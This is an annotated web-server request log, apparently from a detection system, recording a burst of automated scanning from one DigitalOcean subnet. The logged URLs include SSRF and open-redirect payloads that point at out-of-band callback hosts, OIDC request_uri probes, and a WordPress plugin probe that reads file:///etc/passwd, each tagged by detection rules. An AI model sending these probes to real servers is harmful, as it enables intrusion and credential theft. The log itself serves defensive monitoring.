#31 2025-03-10 00:44:10 event 3081392 GET 200 bytes 7219
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/?u=http://cv70744c1utej8crv3ggdtt4ny7kgecno.oast.online/&href=http://cv70744c1utej8crv3ggoz4exqi979mhr.oast.online/&action=http://cv70744c1utej8crv3gg5ck8icnq7wmgt.oast.online/&host=cv70744c1utej8crv3ggtgro1fa99nc98.oast.online&http_host=cv70744c1utej8crv3ggyuwsmknqcip8y.oast.online&email=root@cv70744c1utej8crv3ggir7gpqtbmt5ni.oast.online&url=http://cv70744c1utej8crv3ggn61ihpb49oop5.oast.online/&load=http://cv70744c1utej8crv3gg5xmg1oga8iz61.oast.online/&preview=http://cv70744c1utej8crv3ggh6iecymkujif7.oast.online/&target=http://cv70744c1utej8crv3gggo1tqnjsk6rx1.oast.online/&proxy=http://cv70744c1utej8crv3gga86k6bznxdqc6.oast.online/&from=http://cv70744c1utej8crv3ggpazyir5n6hj7d.oast.online/&src=http://cv70744c1utej8crv3gg3ofh5io7q66zy.oast.online/&ref=http://cv70744c1utej8crv3gg7qzm4w4uni7ow.oast.online/&referrer=http://cv70744c1utej8crv3ggdttoyykbwiubh.oast.online/
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#32 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896
ann ref 8 label ref
Request Multiple redirect parameters observed in one request
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Annotation facts
label
ref
rule
ref:multi_redirect_chain
conf
80.00
details
Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.
url
/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
summary
Multiple redirect parameters observed in one request
details
Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#33 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
url
/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#34 2025-03-10 00:44:09 event 3081388 GET 404 bytes 7900
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
More (full fields + snapshot)
url
/render.html?url=https://oast.live
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#35 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900
ann cred 10 label cred
Request Auth request appears to use an automation-oriented user agent
referer
-
UA
Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Annotation facts
label
cred
rule
cred:scripted_user_agent
conf
70.00
details
Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.
More (full fields + snapshot)
url
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744c1utej8crv3gg97azy51idrgxm.oast.online/
referer
-
UA
Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
summary
Auth request appears to use an automation-oriented user agent
details
Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#36 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900
ann cred label cred
Request Auth endpoint request observed
referer
-
UA
Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Annotation facts
label
cred
rule
cred:auth_hit:oauth_oidc
conf
55.00
details
Row-level auth primitive for downstream aggregation (no velocity logic here).
More (full fields + snapshot)
url
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744c1utej8crv3gg97azy51idrgxm.oast.online/
referer
-
UA
Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
summary
Auth endpoint request observed
details
Row-level auth primitive for downstream aggregation (no velocity logic here).
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#37 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online
referer
-
UA
Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#38 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744c1utej8crv3gg97azy51idrgxm.oast.online/
referer
-
UA
Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#39 2025-03-10 00:44:09 event 3081389 GET 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://cv70744c1utej8crv3ggw5pwryj7r9h61.oast.online%23.salesforce.com/
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#40 2025-03-10 00:44:09 event 3081388 GET 404 bytes 7900
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/render.html?url=https://oast.live
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#41 2025-03-10 00:44:08 event 3081385 GET 404 bytes 7897
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
More (full fields + snapshot)
url
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#42 2025-03-10 00:44:08 event 3081385 GET 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#43 2025-03-10 00:44:08 event 3081384 GET 404 bytes 7899
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.cv70744c1utej8crv3ggpwjp4whkd5wpn.oast.online/
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#44 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898
ann cred 10 label cred
Request Auth request appears to use an automation-oriented user agent
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Annotation facts
label
cred
rule
cred:scripted_user_agent
conf
70.00
details
Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.
More (full fields + snapshot)
url
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
summary
Auth request appears to use an automation-oriented user agent
details
Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#45 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898
ann cred label cred
Request Auth endpoint request observed
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Annotation facts
label
cred
rule
cred:auth_hit:oauth_oidc
conf
55.00
details
Row-level auth primitive for downstream aggregation (no velocity logic here).
More (full fields + snapshot)
url
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
summary
Auth endpoint request observed
details
Row-level auth primitive for downstream aggregation (no velocity logic here).
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#46 2025-03-10 00:44:07 event 3081383 POST 404 bytes 7899
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/AdminTools/querybuilder/logon?framework
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#47 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#48 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223
ann trav 30 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Annotation facts
label
trav
rule
trav:wrapper
conf
94.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot)
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#49 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'
More (full fields + snapshot)
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#50 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot)
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC